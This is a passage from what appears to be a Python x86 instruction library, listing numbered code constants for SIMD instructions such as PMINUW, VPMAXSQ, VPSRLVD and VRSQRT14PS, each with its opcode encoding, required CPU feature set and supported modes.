``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVD2M_KR_ZMM: int = 2950
"""
``VPMOVD2M k1, zmm1``
``EVEX.512.F3.0F38.W0 39 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVQ2M_KR_XMM: int = 2951
"""
``VPMOVQ2M k1, xmm1``
``EVEX.128.F3.0F38.W1 39 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVQ2M_KR_YMM: int = 2952
"""
``VPMOVQ2M k1, ymm1``
``EVEX.256.F3.0F38.W1 39 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVQ2M_KR_ZMM: int = 2953
"""
``VPMOVQ2M k1, zmm1``
``EVEX.512.F3.0F38.W1 39 /r``
``AVX512DQ``
``16/32/64-bit``
"""
PMINUW_XMM_XMMM128: int = 2954
"""
``PMINUW xmm1, xmm2/m128``
``66 0F 38 3A /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINUW_XMM_XMM_XMMM128: int = 2955
"""
``VPMINUW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINUW_YMM_YMM_YMMM256: int = 2956
"""
``VPMINUW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINUW_XMM_K1Z_XMM_XMMM128: int = 2957
"""
``VPMINUW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 3A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUW_YMM_K1Z_YMM_YMMM256: int = 2958
"""
``VPMINUW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 3A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUW_ZMM_K1Z_ZMM_ZMMM512: int = 2959
"""
``VPMINUW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 3A /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMW2D_XMM_KR: int = 2960
"""
``VPBROADCASTMW2D xmm1, k1``
``EVEX.128.F3.0F38.W0 3A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMW2D_YMM_KR: int = 2961
"""
``VPBROADCASTMW2D ymm1, k1``
``EVEX.256.F3.0F38.W0 3A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMW2D_ZMM_KR: int = 2962
"""
``VPBROADCASTMW2D zmm1, k1``
``EVEX.512.F3.0F38.W0 3A /r``
``AVX512CD``
``16/32/64-bit``
"""
PMINUD_XMM_XMMM128: int = 2963
"""
``PMINUD xmm1, xmm2/m128``
``66 0F 38 3B /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINUD_XMM_XMM_XMMM128: int = 2964
"""
``VPMINUD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINUD_YMM_YMM_YMMM256: int = 2965
"""
``VPMINUD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINUD_XMM_K1Z_XMM_XMMM128B32: int = 2966
"""
``VPMINUD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUD_YMM_K1Z_YMM_YMMM256B32: int = 2967
"""
``VPMINUD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2968
"""
``VPMINUD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 3B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUQ_XMM_K1Z_XMM_XMMM128B64: int = 2969
"""
``VPMINUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUQ_YMM_K1Z_YMM_YMMM256B64: int = 2970
"""
``VPMINUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2971
"""
``VPMINUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 3B /r``
``AVX512F``
``16/32/64-bit``
"""
PMAXSB_XMM_XMMM128: int = 2972
"""
``PMAXSB xmm1, xmm2/m128``
``66 0F 38 3C /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXSB_XMM_XMM_XMMM128: int = 2973
"""
``VPMAXSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXSB_YMM_YMM_YMMM256: int = 2974
"""
``VPMAXSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXSB_XMM_K1Z_XMM_XMMM128: int = 2975
"""
``VPMAXSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 3C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSB_YMM_K1Z_YMM_YMMM256: int = 2976
"""
``VPMAXSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 3C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSB_ZMM_K1Z_ZMM_ZMMM512: int = 2977
"""
``VPMAXSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 3C /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXSD_XMM_XMMM128: int = 2978
"""
``PMAXSD xmm1, xmm2/m128``
``66 0F 38 3D /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXSD_XMM_XMM_XMMM128: int = 2979
"""
``VPMAXSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXSD_YMM_YMM_YMMM256: int = 2980
"""
``VPMAXSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3D /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXSD_XMM_K1Z_XMM_XMMM128B32: int = 2981
"""
``VPMAXSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSD_YMM_K1Z_YMM_YMMM256B32: int = 2982
"""
``VPMAXSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2983
"""
``VPMAXSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 3D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSQ_XMM_K1Z_XMM_XMMM128B64: int = 2984
"""
``VPMAXSQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSQ_YMM_K1Z_YMM_YMMM256B64: int = 2985
"""
``VPMAXSQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2986
"""
``VPMAXSQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 3D /r``
``AVX512F``
``16/32/64-bit``
"""
PMAXUW_XMM_XMMM128: int = 2987
"""
``PMAXUW xmm1, xmm2/m128``
``66 0F 38 3E /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXUW_XMM_XMM_XMMM128: int = 2988
"""
``VPMAXUW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXUW_YMM_YMM_YMMM256: int = 2989
"""
``VPMAXUW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3E /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXUW_XMM_K1Z_XMM_XMMM128: int = 2990
"""
``VPMAXUW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 3E /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUW_YMM_K1Z_YMM_YMMM256: int = 2991
"""
``VPMAXUW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 3E /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXUW_ZMM_K1Z_ZMM_ZMMM512: int = 2992
"""
``VPMAXUW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 3E /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXUD_XMM_XMMM128: int = 2993
"""
``PMAXUD xmm1, xmm2/m128``
``66 0F 38 3F /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXUD_XMM_XMM_XMMM128: int = 2994
"""
``VPMAXUD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXUD_YMM_YMM_YMMM256: int = 2995
"""
``VPMAXUD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3F /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXUD_XMM_K1Z_XMM_XMMM128B32: int = 2996
"""
``VPMAXUD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUD_YMM_K1Z_YMM_YMMM256B32: int = 2997
"""
``VPMAXUD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2998
"""
``VPMAXUD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 3F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUQ_XMM_K1Z_XMM_XMMM128B64: int = 2999
"""
``VPMAXUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUQ_YMM_K1Z_YMM_YMMM256B64: int = 3000
"""
``VPMAXUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 3F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3001
"""
``VPMAXUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 3F /r``
``AVX512F``
``16/32/64-bit``
"""
PMULLD_XMM_XMMM128: int = 3002
"""
``PMULLD xmm1, xmm2/m128``
``66 0F 38 40 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMULLD_XMM_XMM_XMMM128: int = 3003
"""
``VPMULLD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 40 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULLD_YMM_YMM_YMMM256: int = 3004
"""
``VPMULLD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 40 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULLD_XMM_K1Z_XMM_XMMM128B32: int = 3005
"""
``VPMULLD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 40 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULLD_YMM_K1Z_YMM_YMMM256B32: int = 3006
"""
``VPMULLD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 40 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULLD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3007
"""
``VPMULLD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 40 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULLQ_XMM_K1Z_XMM_XMMM128B64: int = 3008
"""
``VPMULLQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 40 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMULLQ_YMM_K1Z_YMM_YMMM256B64: int = 3009
"""
``VPMULLQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 40 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMULLQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3010
"""
``VPMULLQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 40 /r``
``AVX512DQ``
``16/32/64-bit``
"""
PHMINPOSUW_XMM_XMMM128: int = 3011
"""
``PHMINPOSUW xmm1, xmm2/m128``
``66 0F 38 41 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPHMINPOSUW_XMM_XMMM128: int = 3012
"""
``VPHMINPOSUW xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 41 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VGETEXPPS_XMM_K1Z_XMMM128B32: int = 3013
"""
``VGETEXPPS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPS_YMM_K1Z_YMMM256B32: int = 3014
"""
``VGETEXPPS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPS_ZMM_K1Z_ZMMM512B32_SAE: int = 3015
"""
``VGETEXPPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 42 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPD_XMM_K1Z_XMMM128B64: int = 3016
"""
``VGETEXPPD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPD_YMM_K1Z_YMMM256B64: int = 3017
"""
``VGETEXPPD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 42 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPPD_ZMM_K1Z_ZMMM512B64_SAE: int = 3018
"""
``VGETEXPPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 42 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPSS_XMM_K1Z_XMM_XMMM32_SAE: int = 3019
"""
``VGETEXPSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.66.0F38.W0 43 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGETEXPSD_XMM_K1Z_XMM_XMMM64_SAE: int = 3020
"""
``VGETEXPSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.66.0F38.W1 43 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPLZCNTD_XMM_K1Z_XMMM128B32: int = 3021
"""
``VPLZCNTD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTD_YMM_K1Z_YMMM256B32: int = 3022
"""
``VPLZCNTD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTD_ZMM_K1Z_ZMMM512B32: int = 3023
"""
``VPLZCNTD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 44 /r``
``AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTQ_XMM_K1Z_XMMM128B64: int = 3024
"""
``VPLZCNTQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTQ_YMM_K1Z_YMMM256B64: int = 3025
"""
``VPLZCNTQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 44 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPLZCNTQ_ZMM_K1Z_ZMMM512B64: int = 3026
"""
``VPLZCNTQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 44 /r``
``AVX512CD``
``16/32/64-bit``
"""
VEX_VPSRLVD_XMM_XMM_XMMM128: int = 3027
"""
``VPSRLVD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 45 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRLVD_YMM_YMM_YMMM256: int = 3028
"""
``VPSRLVD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 45 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRLVQ_XMM_XMM_XMMM128: int = 3029
"""
``VPSRLVQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 45 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRLVQ_YMM_YMM_YMMM256: int = 3030
"""
``VPSRLVQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 45 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLVD_XMM_K1Z_XMM_XMMM128B32: int = 3031
"""
``VPSRLVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVD_YMM_K1Z_YMM_YMMM256B32: int = 3032
"""
``VPSRLVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3033
"""
``VPSRLVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 45 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3034
"""
``VPSRLVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3035
"""
``VPSRLVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 45 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3036
"""
``VPSRLVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 45 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPSRAVD_XMM_XMM_XMMM128: int = 3037
"""
``VPSRAVD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 46 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSRAVD_YMM_YMM_YMMM256: int = 3038
"""
``VPSRAVD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 46 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRAVD_XMM_K1Z_XMM_XMMM128B32: int = 3039
"""
``VPSRAVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVD_YMM_K1Z_YMM_YMMM256B32: int = 3040
"""
``VPSRAVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3041
"""
``VPSRAVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 46 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVQ_XMM_K1Z_XMM_XMMM128B64: int = 3042
"""
``VPSRAVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVQ_YMM_K1Z_YMM_YMMM256B64: int = 3043
"""
``VPSRAVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 46 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRAVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3044
"""
``VPSRAVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 46 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPSLLVD_XMM_XMM_XMMM128: int = 3045
"""
``VPSLLVD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 47 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSLLVD_YMM_YMM_YMMM256: int = 3046
"""
``VPSLLVD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 47 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSLLVQ_XMM_XMM_XMMM128: int = 3047
"""
``VPSLLVQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 47 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPSLLVQ_YMM_YMM_YMMM256: int = 3048
"""
``VPSLLVQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 47 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLVD_XMM_K1Z_XMM_XMMM128B32: int = 3049
"""
``VPSLLVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVD_YMM_K1Z_YMM_YMMM256B32: int = 3050
"""
``VPSLLVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 3051
"""
``VPSLLVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 47 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVQ_XMM_K1Z_XMM_XMMM128B64: int = 3052
"""
``VPSLLVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVQ_YMM_K1Z_YMM_YMMM256B64: int = 3053
"""
``VPSLLVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 47 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 3054
"""
``VPSLLVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 47 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PS_XMM_K1Z_XMMM128B32: int = 3055
"""
``VRCP14PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PS_YMM_K1Z_YMMM256B32: int = 3056
"""
``VRCP14PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PS_ZMM_K1Z_ZMMM512B32: int = 3057
"""
``VRCP14PS zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 4C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PD_XMM_K1Z_XMMM128B64: int = 3058
"""
``VRCP14PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PD_YMM_K1Z_YMMM256B64: int = 3059
"""
``VRCP14PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 4C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14PD_ZMM_K1Z_ZMMM512B64: int = 3060
"""
``VRCP14PD zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 4C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14SS_XMM_K1Z_XMM_XMMM32: int = 3061
"""
``VRCP14SS xmm1 {k1}{z}, xmm2, xmm3/m32``
``EVEX.LIG.66.0F38.W0 4D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRCP14SD_XMM_K1Z_XMM_XMMM64: int = 3062
"""
``VRCP14SD xmm1 {k1}{z}, xmm2, xmm3/m64``
``EVEX.LIG.66.0F38.W1 4D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PS_XMM_K1Z_XMMM128B32: int = 3063
"""
``VRSQRT14PS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PS_YMM_K1Z_YMMM256B32: int = 3064
"""
``VRSQRT14PS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PS_ZMM_K1Z_ZMMM512B32: int = 3065
"""
``VRSQRT14PS zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 4E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PD_XMM_K1Z_XMMM128B64: int = 3066
"""
``VRSQRT14PD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PD_YMM_K1Z_YMMM256B64: int = 3067
"""
``VRSQRT14PD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 4E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14PD_ZMM_K1Z_ZMMM512B64: int = 3068
"""
``VRSQRT14PD zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 4E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14SS_XMM_K1Z_XMM_XMMM32: int = 3069
"""
``VRSQRT14SS xmm1 {k1}{z}, xmm2, xmm3/m32``
``EVEX.LIG.66.0F38.W0 4F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VRSQRT14SD_XMM_K1Z_XMM_XMMM64: int = 3070
"""
``VRSQRT14SD xmm1 {k1}{z}, xmm2, xmm3/m64``
``EVEX.LIG.66.0F38.W1 4F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPDPBUSD_XMM_K1Z_XMM_XMMM128B32: int = 3071
"""
``VPDPBUSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 50 /r``
``AVX512VL and AVX512_VNNI``
``16/32/64-bit``
"""
EVEX_VPDPBUSD_YMM_K1Z_YMM_YMMM256B32: int = 3072
"""
``VPDPBUSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 50 /r``
